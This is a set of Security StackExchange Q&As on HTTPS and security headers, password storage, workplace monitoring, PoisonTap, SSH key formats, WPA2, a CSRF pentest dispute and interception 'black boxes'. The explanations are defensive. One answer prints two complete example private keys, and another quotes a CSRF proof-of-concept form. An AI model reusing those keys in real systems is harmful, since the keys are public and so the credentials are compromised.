The common web application attack vectors don't apply to a strictly static website. Without interactive elements there are no accounts to hijack or cookies to steal. Nonetheless, you should provide your visitors with encrypted access - even if you're not hosting delicate content. TL;DR Use HTTPS with HSTS to ensure some degree privacy and the integrity of your content to visitors. Adding HPKP to a static site might be unnecessarily paranoid and you have to be careful when deploying it. The other discussed security measures are mostly irrelevant for a static site, but they are so simple to implement that you might still decide to use them. HTTPS Yes, do it. With free SSL certificate providers like Let's Encrypt you need a very good reason not to switch. HTTPS protects privacy and integrity of the transmitted data which is desirable even with static content. Scenario for an integrity violation: If you offer downloads, a man-in-the-middle attacker could tamper with the files to deliver malware. Example of a privacy violation: My employer, the owner the WiFi hotspot I'm connected to or my ISP could all see which exact articles I'm reading and content I'm downloading from your site. With HTTPS however, I would mostly expose metadata (the IP address I'm connected to, the hostname due to SNI , etc. ). HTTP Strict Transport Security Yes, do it. HSTS helps to enforce that users only use HTTPS to connect to your website, thereby preventing SSL stripping attacks. If you roll out HTTPS, it makes a lot of sense to follow up with HSTS. It's easily implemented by adding an additional response header, like this: Strict-Transport-Security: max-age=31536000 Since HSTS only takes effect from the first time a user encounters the header ( TOFU model ) and until the max-age timeout is reached, you might even want to submit your site to the HSTS preload list . This has the effect that users will start connecting via HTTPS from their very first visit. Be aware that it's troublesome to switch back to plain HTTP after enabling HSTS. HTTP Public Key Pinning ("Certificate Pinning") It depends. While HSTS tells the browser to strictly use HTTPS for a given time, a HPKP header specifies which certificates the browser should trust in the future. Pinning public keys from the certificate chain protects users against an attacker replacing your certificate with a rogue one. Such an attack is very unlikely since the adversary would need to compromise a CA to be able to issue rogue certificates (although that has happened before ). Additionally, you have to be careful when setting up HPKP since a defective deployment could make your site unavailable to previous users. Detectify Labs have an excellent article on HPKP with a more optimistic conclusion: So should you use HPKP? Yes, you should. If you pin correctly, the chance of everything going south is pretty small. Content Security Policy Yes, but you might not really need it. The CSP was created to mitigate XSS and related attacks by limiting which resource type from which origin is allowed to be loaded by your site. Since you have a purely static website and probably don't embed external sources at all, it might not be an actual attack vector. A sensible policy would depend on which kind of resources you are loading. For example, this restrictive policy header only allows content from the same origin: Content-Security-Policy: default-src 'self' Clickjacking protection Yes, why not. Clickjacking attacks trick a user into unwittingly interacting with your website through a disguised frame. If you have no interactive elements however, there is no actual damage to be done. (In a better world cross-origin frames would be an opt-in feature, though.) The implementation is straightforward. This example disallows any frame embedding at all: X-Frame-Options: Deny Note that the XFO header has been declared obsolete in favor of the frame-ancestors CSP directive: Content-Security-Policy: frame-ancestors 'none' Content sniffing protection Yes, why not. If you don't correctly declare content types, browsers might guess (sniff) the type (although that behavior has become less common). This is particularly dangerous with user content that is supposed to be non-executable but determined to be an executable format after sniffing due to a missing content type. With your static site that will hardly become an issue. Just to be safe you could add the following header to prevent sniffing (but it's not a replacement for properly declared MIME types): X-Content-Type-Options: nosniff See also: Does X-Content-Type-Options really prevent content sniffing attacks? Also have a look at the OWASP Secure Headers Project for more details on security-relevant headers with some real-life examples.
{ "source": [ "https://security.stackexchange.com/questions/142496", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102236/" ] }
142,546
I saw someone's interesting practice to store sensitive information. He is saving all his thousand logins (including banks and email) in a access-restricted Google spread sheet , stored on his Google drive . The link to the document is shortened using some URL-shortener and he uses that simple-to-remember link to open the document every time he needs a specific password or an account number. His argument is that the practice is secure enough because: The document is on his personal Google drive protected by Google, as for the external attacks. So the location is more secure than e.g. his PC. The access to document needs google login, which is 2-way secured. P.S. (I mean 2-step verification of google) The URL to that document is not known to anyone else except himself, his browser, and the shortener service, all of whom cannot access the document without login details. Rest of the world doesn't know the location/URL. He opens the document only on his PC, laptop, and mobile. The information in such a document is everything that someone needs to impersonate him and I don't think this method is so foolproof. Can some one justify technically, how secure this practice is? Can you suggest an alternative as easy as typing a URL everytime he needs to recall a password? P.S. I am impresed at first sight, with these two professional utilities (password managers) dedicated for this purpose, came to know from the answers below: KeePass and Lastpass (any others?) While both seem to be cost-free, first is preferable to me for being open-source -- I am going to give it a try. Mentioning efficient alternatives (esp. as easy as a short-URL above) like this will be the most important take-away from this post. For me, in spite of having heard about password managers many times, I never really focused on them.
When thinking about security, you must be able to say: what threat you want to address what attacker you want to be protected from and then review the possible weaknesses. A restricted access file on a well configured Google drive is correctly protected from all attacks from the guy next door. As you say that the Google account is 2 ways secured (what do you mean exactly?) a guy that cannot guess how to login cannot access the file... provided you are fully confident in Google! And here come the weaknesses... as the file has only restricted access, any Google employee with admin privileges can read it - do you know how many of them exist? Google is a firm well-known for technical excellence, so the risk that it is hacked is reasonably low. But what if a fired employee decides to make public files from Google drives as a revenge, simply because it would be bad for Google's reputation? because of the Patriot Act, US law inforcement agencies can access any data from US companies, and Google is one. Whether it is or not a problem is up to you. For that reason, I would never store passwords in a non securely encrypted file. Google drive is certainly a correct repository, but I would rather use a Keypass file there - can be synchronized from any device - than a mere spreadsheet.
{ "source": [ "https://security.stackexchange.com/questions/142546", "https://security.stackexchange.com", "https://security.stackexchange.com/users/72483/" ] }
142,803
This is an attempt at a canonical question following this discussion on Meta . The aim is to produce basic answers that can be understood by the general audience. Let's say I browse the web and use different apps while connected to the network at work. Can my employer (who controls the network) see what websites I visit, what emails I send, my IM messages, what Spotify songs I listen to, etc? What are they able to see? Does it matter if I use my own computer, or one provided for me by my employer? Does it matter what programs I use, or what websites I visit?
Yes. Always assume yes. Even if you are not sure, always assume yes. Even if you are sure, they might have a contract with the ISP, a rogue admin who installed a packetlogger, a video camera that catches your screen... yes. Everything you do at the workplace is visible to everyone . Especially everything you do on digital media. Especially personal things. Especially things you would not want them to see. One of the basic rules of Information Security is that whoever has physical access to the machine, has the machine. Your employer has physical access to everything: the machine, the network, the infrastructure . He can add and change policies, install certificates, play man in the middle. Even websites with 'SSL' can be intercepted. There are plenty of valid reasons for this, mostly related to their own network security (antivirus, logging, prohibiting access to certain sites or functionalities). Even if you get lucky and they cannot see the contents of your messages, they might still be able to see a lot of other things: how many connections you made, to which sites, how much data you sent, at what times... even when using your own device, even using a secure connection, network logs can be pretty revealing. Please, when you are at work, or using a work computer, or even using your own computer on the company network: always assume everything you do can be seen by your employer .
{ "source": [ "https://security.stackexchange.com/questions/142803", "https://security.stackexchange.com", "https://security.stackexchange.com/users/111078/" ] }
142,863
Wouldn't it be smarter to measure password entropy and reject low entropy passwords? This would allow short passwords using the whole character set to pass, aswell as long passwords only using parts of the character set. Is the above scheme possible or do implementation details prevent something like this to be done? Does any site or programm already incorporate such password requirements?
After the famous XKCD strip , there were a few projects started up to deal with exactly this kind of entropy checking. One of these was the ZXCVBN password checker , made by a Dropbox employee. It is possibly the most thorough password checker of its kind. It checks for patterns, words, and more, adding to (or subtracting from) an entropy score accordingly. It is explained in detail on their blog .
{ "source": [ "https://security.stackexchange.com/questions/142863", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77793/" ] }
142,879
I just heard of PoisonTap today. Here is a short description from a TechCrunch article: PoisonTap connects to the USB port and announces itself not as a USB device, but an Ethernet interface. The computer, glad to switch over from battery-sucking Wi-Fi, sends a DHCP request, asking to be assigned an IP. PoisonTap responds, but in doing so makes it appear that a huge range of IPs are not in fact out there on servers but locally connected on the LAN, through this faux wired connection. And you don’t even have to be there: pre-loaded items like analytics and ads will be active, and as soon as one of them sends an HTTP request — BAM, PoisonTap responds with a barrage of data-caching malicious iframes for the top million Alexa sites. And those iframes, equipped with back doors, stick around until someone clears them out. This sounds quite worrisome, yet I did not hear too much about it yet. So my main question is: How vulnerable are people to the PoisonTap hack? It seems like the following points would be relevant: Is the general population at risk, or only a very specific subset (OS, browser?) What exactly is at risk, your data, your gmail account ...? Is it something that most people can pull off, or does it depend on specific hardware and a high level of skill? Is there something that one can do easily, without closing all browsers or turning off the PC each time when you walk to a different room to ask a short question. (Is locking it sufficient?) And of course, if it is as bad as it seems: can we expect updates soon that would make it safer to go to the toilet again?
First the attacker needs to have physical access to the machine in order to plug the device into the USB port. This means any kind of full remote exploit is not possible. It does work though if the computer screen is locked with a password or similar. Note that the physical access does not need to be direct, i.e. it can also be some gullible user plugging a donated USB stick into the system. Then the device announces itself as a USB ethernet device. This means that the computer will try to add PoisonTap as a network device to the system and get an IP address from it using DHCP. The DHCP response will return an IP address with a /1 subnet so that most IPv4 traffic is sent to the device. From then on the attacker has the same access to the device like a router: in fact the device works as a router for the attacked computer. This means that any traffic can be easily sniffed and modified but that encrypted connections are still protected against decryption and modifications get detected. This means for example that access of gmail over https (the usual way) will not be compromised. At the end it is just another way for a local attacker. The impact of the attack is comparable to redirecting someone's traffic via ARP or DHCP spoofing, hijacking the local router or a rogue access point. Not more can be done as with these attacks but also nothing less. It looks like that the software comes with some nice attacks which modify unencrypted HTTP connections to access different sites in order to poison the browsers cache with heavily used scripts (like a poisoned google analytics etc). Since many sites include such third party code and such code gets access to the full page a poisoned code can extract lots of useful information. But again, this works only for HTTP not HTTPS. Is the general population at risk, or only a very specific subset (os,browser?) Most current systems are at risk but the attacker needs physical access. What exactly is at risk, your data, your gmail account ...? Sniffing and modification of unencrypted connections. Gmail usually is encrypted and thus not affected. Is it something that most people can pull off, or does it depend on specific hardware and a high level of skill? It needs special hardware and software but the hardware is cheap and the software released. It needs about the same level of experience as attacks like ARP or DHCP spoofing, i.e. script kiddies could do it. Is there something that one can do easily, without closing all browsers or turning off the pc each time when you walk to a different room to ask a short question. (Is locking it sufficient?) The usual protections against other USB based attacks still work, i.e. disable USB or restrict the kind of devices. But note that if the device has an ethernet port you could mount a similar attack through this since any kind of wired connections is preferred to wireless by most systems.
{ "source": [ "https://security.stackexchange.com/questions/142879", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15756/" ] }
143,114
When one creates an ECC SSH key for example, this command can be used: ssh-keygen -o -a 100 -t ed25519 As I understand, the -o argument is used to generate: The private keys using a newer format opposed to the more commonly accepted PEM Are these "newer formats" DSA/RSA/ECC or might it be PPK vs PEM? Sorry if I confuse SSH key formats with private SSH keys' file extensions ; I wish to ask of the main difference between PEM to the "newer formats" mentioned in the quote.
First off, here's the full man page entry for ssh-keygen -o from my machine ( ssh-keygen doesn't seem to have a version flag, but the man page is from February 17, 2016) -o Causes ssh-keygen to save private keys using the new OpenSSH format rather than the more compatible PEM format . The new format has increased resistance to brute-force password cracking but is not supported by versions of OpenSSH prior to 6.5. Ed25519 keys always use the new private key format. Seems pretty clear that this is just about the format of the file that's being produced. Also note that ssh-keygen will only store Ed25519 keys in the new format, regardless of what flags you pass in. Since both of your questions today have had the same underlying question, let's deal with it. ... these "newer formats" DSA/RSA/ECC ... Ok, so DSA, RSA, and ECC are not different formats, they are completely different algorithms and are completely unrelated to each other. I wish I could find a better way of explaining this, but I'm not sure I can without getting too technical. Let's try this: it's a bit like saying that http and ftp are just different formats for transferring files, or .docx and .pptx are different formats of Office documents. Calling these "just format differences" is fundamentally wrong, the software is doing a very different thing in the two cases (albeit to produce the same end-result; transferring a file, or making a pretty document). Now let's talk about formats. So you want to save a private key in a file? PEM is a file format for storing general cryptgraphic information, but other file formats exist. PEM can be used for many things: private keys, or certificates, or the text of an email that you want to encrypt or sign. It's just a container "cryptographic stuff". Analogy time: saving a Word document. You could save it in the old .doc format which is universally accepted by all versions of Office and also open source programs (PEM is also older and universally accepted), or you could use the newer .docx format (the -o OpenSSH format). Sometimes new features are not backwards compatible and can only be saved in the new format (like ed25519). (Many thanks to @GordonDavisson for this analogy) With the exception of backwards compatibility, which format you choose really has nothing to do with the contents of the file. #Examples: ##PEM format with an RSA key. Note that the message starts with -----BEGIN RSA PRIVATE KEY----- , this is standard industry-wide PEM format - any software that can read PEM will be able to read this: $ ssh-keygen -a 100 -t rsa $ cat .ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAwTLkTDZUisg0M/3BDBOjrmBvJXb8cdfveGG1KQhAhFDLMp5w XKgGFMy339m3TGB1+ekKoXnX3dcRQtpQbuFeDB59cmKpDGZz7BzfetpjeIOGCzG+ Vt2BnDf2OlKb6EE7tC3PSmFgL0nQPSyz8x7rE7CMOQEnz1tKkK9Gpttcku8ifwmd LAHlVaTV3BIiFJN23fwe7l0czFaV98iy8YRgk/Av3gRlsBABGT5qD8wPiI4Ygpxv UuT2kq53lhBTWO9hIth5tUU0N7x7QN6/rRSi2uHcmJYXFkpsLie697G17TN5ln3E X5frsrjVyu0JhjvC5mlRBudSJWcWm/KrcTQxdQIDAQABAoIBAFR6nWtZ4nPhATqu veg6+jq4vkEim1ZodrUr/FxZ2GRDM+cJctaBPk+ACPMgL099ankB1v0u2x6M+WZD MiKZ91bTSkVnMMZUUmIvaeU9c3tx/34LnVA8gX0+1zM/hh7zz1iFI3xBwh5LZ3wo fPNVVLOCYn5WrAK2x48mpX02tG8m0OY5kdCdFW1f6UbCGk3K9ov82yQ+JbjWydOS ZaS7bnJCRsjDhPm/Ooe2DZ8CKHRO3DOiZAAFYqsosxM2C12+alC+hdKHoJ0pWZWe eckZiALTENi+PzgSq4ykdBaoreeI84lpIzYQO06rrjM2/fw1x/SQsDYhCsQnNRib sipl2mECgYEA74rBQDIEWaIVVZ72foeZYOMmAUKCLQtNxVuGl/XoMZO3evN2vbOv Nw/nn5lVt6PRykVUUl6yb5gHvRSGtGJSB1q6pBVN1EF2sfvUep6mmpEwbSbENiAX IftE0ap7PKT1aLKbLllwdsJlLCRMJIk07AvsulbkhSC+UmJVkfjblgkCgYEAznkE fzmWS358MLxb0JM+4v1DO/1ne8z29ddHNppxSNj2Xjf+MMvOY4KaRQa8dMwc3Eqa 1EvPqnK6ila4L08Ai4CyWoGkkkIQBO9jO3mLp24xk6TRo002DbfJRnu4qW4zeryp gYeFfBzwhc/IQKjXhv8AAfEUFCSYiFaWBsENuw0CgYEAwmyDyCAQqdPFrzYT6cUT t7EGYtVhpT/cgshz6Rk9uiekL9Y2VWjnWTC+liq1iRUdLSiydRzJhYwHE+/6GaUH 4VJB1PY5soLj3TiCUHg+z4vym1VwwmGvhPRV+jt+RU26ppz5GVic0LeduINJjgoT e1d+cAwg9PELqQCJZa5wREkCgYBPEuPZAaoAsalIVOro32uHLS1xrSPTsvSlxFO+ orleB9Ga1eDguT0KuTrx0pmcNYucBmpzgbE/ev7b+khBvgTcaGZl6R6o8OoHqdKc NXl5nucXv1iWLPzVlhxchQd8w/qtN9HHDKrflIm9BY2Qzdj1F3XeSIDDEhzkohyE 66yhhQKBgGh9knh8SxnVxaPk0Rk/bQope9AwIDuIpfsf4KC/EPSZmMNHP8xBh8al eymUot7Pj6dck31V4C3q74NKobY3p6fZ5t7tP9K6Br+J/FQFhvAdFAwpTD2Bks5H fhZO5cniPpydb0YvOnoaVnb0nzXVsf1jIgPKfsCsZxoyE0jLb9oV -----END RSA PRIVATE KEY----- ##OpenSSH format with an ed25519 key: In addition to it being shorter (because ECC keys just are that much shorter) notice that the message starts with ----BEGIN OPENSSH PRIVATE KEY----- , this is in OpenSSH-specific format that other software may or may not be able to read: $ ssh-keygen -o -a 100 -t ed25519 $ cat .ssh/id_ed25519.o -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW QyNTUxOQAAACC7gIlwBMp+H6VVNZSHI0in2iCU/yi67WfeFPfuyAdkBAAAAJh7nk7je55O 4wAAAAtzc2gtZWQyNTUxOQAAACC7gIlwBMp+H6VVNZSHI0in2iCU/yi67WfeFPfuyAdkBA AAAEBHl+qBAosBAUIGuvdDR8gJN/PEhempLe4NtyKiO7hCPLuAiXAEyn4fpVU1lIcjSKfa IJT/KLrtZ94U9+7IB2QEAAAAEm1pa2VATWlrZS1zYW1zdW5nMQECAw== -----END OPENSSH PRIVATE KEY-----
{ "source": [ "https://security.stackexchange.com/questions/143114", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
143,268
WPA 2 can be cracked using Aircrack-ng in Kali Linux. Is there any other security protocol for Wi-Fi which is not compromised?
EDIT/UPDATE 2017-10-17 : This answer does not account for KRACK. That's an attack on both WPA2-PSK and WPA2-Enterprise. There's ways to detect and mitigate it, but they're not covered here. You need to make a difference here. There's multiple things to consider. Also " WPA2 " isn't precise enough – there's WPA2-PSK ( pre-shared key ), and WPA2-Enterprise (which relies on an external auth server) 1. The attacker wants to gain access to traffic or network, but is not in possession of the credentials to enter Well, bad luck. WPA2, both PSK and Enterprise protect well against that, unless the credentials are easy to guess. And that's not a "brokenness" on part of the system – if you used your user name as login to a website, you really can't blame the website for being "easy to crack". So, in this respect, WPA2 is utterly secure (as long as you don't use WPS , but your question is about hotspots, so that's pretty surely not the case). 2. The attacker is already part of the network and now wants to read other user's traffic That's an especially relevant attack scenario for hotspots – getting access to the network might be as simple as buying a cup of coffee in cash. So. Let's make a difference here: 2.1. Hotspot uses WPA2-Enterprise You log on to the hotspot, proving (securely) that you know the credentials. The access point checks that in cooperation with an authentication server (802.1x). The authentication server generates a secret that is cryptographically secure enough to base your communication with the Access Point on. Every user gets a different key for encrypting their traffic. No user can spy on other users. WPA2-enterprise is not "broken" in any sense of the word. 2.2. Hotspot uses WPA2-PSK You log onto the access point, proving that you know the PSK. The access point generates, in cooperation with you, a secret key with which you encrypt and decrypt traffic between you and the hotspot. Other users do the same: prove that they know (the same) PSK, then generate a secret for their traffic crypto. So, in a first look at the system, this is just as secure as WPA2-Enterprise. HOWEVER: Due to weaknesses in the way the user-AP secret keys are generated, it's very easy for someone who already has one of these keys (which being logged on to the cafe's AP guarantees) and knows the PSK (which every user of your favourite coffee shop does) to recover the secret user-AP key of someone else by observing but a couple packets, totally passive. That is a serious design flaw. Hence, WPA2-PSK is "broken" in the sense that it doesn't protect users of a WiFi network against spying by other legitimate users of the same network. @Josef and I aren't in full agreement whether that is "by design" or really "brokenness". In any case, what you should take away from this is: whenever you're on a WiFi that uses the same key for everyone, your traffic can be read by everyone else on the network. Is there any other security protocol for Wi-Fi which is not compromised? Use WPA2-Enterprise. You will need to set up a 802.1x server (typically, radius or something equivalent), and that can be a hassle, but if you own an Access Point and want to provide secure access to everyone, that's your only choice. And it's not that complicated, at all. If you're just a user of a wifi, old saying says: Trust no-one else's infrastructure. Use encryption. In other words, if you're on a network where you can't trust other users, you might as well not trust the Access Point, which has the job of deciphering your WiFi traffic... Use a VPN whenever you're on someone else's network. That's standard etiquette.
{ "source": [ "https://security.stackexchange.com/questions/143268", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94443/" ] }
143,351
We've recently had one of our webapps pentested. All went well, except for a CSRF vulnerability, and it is this finding I have a bone to pick with. Some background: we're using ASP.NET MVC and, among other things, we do use the CSRF protection functionality built into it. The way it works is strictly in accordance with what OWASP recommends : by including so-called "synchronizer tokens", one in a HTTP cookie, and another in a hidden input named __RequestVerificationToken : <form action="/Home/Test" method="post"> <input name="__RequestVerificationToken" type="hidden" value="6fGBtLZmVBZ59oUad1Fr33BuPxANKY9q3Srr5y[...]" /> <input type="submit" value="Submit" /> </form> We also do regular Acunetix scans, and said scans never found any CSRF-unprotected forms. Now, what the pentesters claim is that they were able to "breach" our CSRF protection with the following code: <html> <body> <form action="https://our.site/support/discussions/new" method="POST"> <input type="hidden" name="subject" value="Subject" /> <input type="hidden" name="content" value="Content" /> <input type="hidden" name="__RequestVerificationToken" value="_e-upIZFx7i0YyzrVd[...]" /> <input type="submit" value="Submit Request" /> </form> </body> </html> The inclusion of the __RequestVerificationToken field is what bothers me the most: to me, it is akin to claiming that an attacker has transferred gazillion dollars from my bank account because I voluntarily gave him my iPhone to fiddle with, and he saw the one-time password that my bank sent in an SMS. I imagine that the only way this attack could potentially work is if we were not using HTTPS, were vulnerable to XSS, were using non-HTTP-only cookies and were negligent with a Same Origin Policy. None of which is true, since none of these vulnerabilities were reported by either pentesters or Acunetix. So the question is: am I wrong and this is a legit CSRF vulnerability or is it not?
This does not seem to be a CSRF vulnerability. If an attacker needs to know a CSRF Token, then it's not an attack. And your approach to CSRf does seem to be correct. Issues which leak the CSRF Token can indeed result in a CSRF attack, but then the problem isn't incorrect CSRF protection, but those issues (XSS, encryption, CSRF Token in URL, and so on). Still, I would ask the tester for clarification. Who knows, maybe the attack always works with that specific token, because it is hardcoded somewhere, or because the special characters are causing some sort of problem for your application. Or maybe it is possible to use a token from a different user, or maybe the token check just doesn't work at all and it accepts arbitrary tokens. The report should have contained more details, so I would check back with the tester about this.
{ "source": [ "https://security.stackexchange.com/questions/143351", "https://security.stackexchange.com", "https://security.stackexchange.com/users/30103/" ] }
143,387
I have been reading about the Snoopers charter bill that was passed in the UK this week. It mentions a "Black Box" which is cited here: ‘Black boxes’ to monitor all internet and phone data . It states it works like so: When an individual uses a webmail service such as Gmail, for example, the entire webpage is encrypted before it is sent. This makes it impossible for ISPs to distinguish the content of the message. Under the Home Office proposals, once the Gmail is sent, the ISPs would have to route the data via a government-approved “black box” which will decrypt the message, separate the content from the “header data”, and pass the latter back to the ISP for storage. It is very vague on how it works to "decrypt" the data. Is there such a thing as a "Black Box" and should I be concerned?
Yes. It's called a Man-in-the-Middle attack. You terminate the SSL session at a mid-point, thereby having the encryption key, then create a new session to the target server, so you have that encryption key too. The data path now goes User->MitM->Server, where each of the arrows is an encrypted connection. Data returned from the server goes Server->MitM->User, again, where each arrow is encrypted, but the other points are not. There are ways to prevent this from working, but in the case of a government mandated system, it seems likely that these will be specifically avoided - there may be regulations for companies to provide valid certificates for the "black boxes", so that HPKP keeps working, for example. It is unclear whether such rules would apply to companies which don't operate directly in the UK, or whether there would be penalties for attempting to bypass these rules (for example, by the use of VPNs based in other countries). Edit based on comments : Note that it is technically possible to create such a device, but the problems mostly come from requiring cooperation from a large number of parties. As a government, there are options available which aren't possible for smaller actors. For example, it would be possible (if unlikely) to require that all internet connected devices sold in the UK come pre-configured with a government issued root CA certificate, and to prosecute anyone using a device which does not have this installed. This would be terrible for internet security, but so is the overall concept, so it depends on security experts convincing the government just how bad this idea is.
{ "source": [ "https://security.stackexchange.com/questions/143387", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87457/" ] }